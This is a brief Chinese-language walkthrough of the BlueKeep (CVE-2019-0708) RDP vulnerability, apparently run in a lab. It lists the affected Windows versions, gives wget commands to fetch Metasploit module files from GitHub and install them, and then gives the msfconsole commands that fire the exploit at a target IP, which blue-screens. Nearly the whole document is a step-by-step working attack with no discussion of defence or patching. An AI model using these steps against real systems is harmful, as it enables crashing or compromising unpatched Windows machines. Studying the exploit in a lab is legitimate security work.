影响版本
该漏洞影响旧版本的Windows系统,包括:Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
下载套件
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
替换
将下载文件分别替换到一下目录:
/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
msf进行更新
apt-get update
apt-get install metasploit-framework
开启靶机3389端口
启动msf
搜索0708查看文件加载成功:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
启用0708RDP模块攻击
使用show options
设置参数
set rhosts 192.168.31.153
set target 3
exploit
靶机蓝屏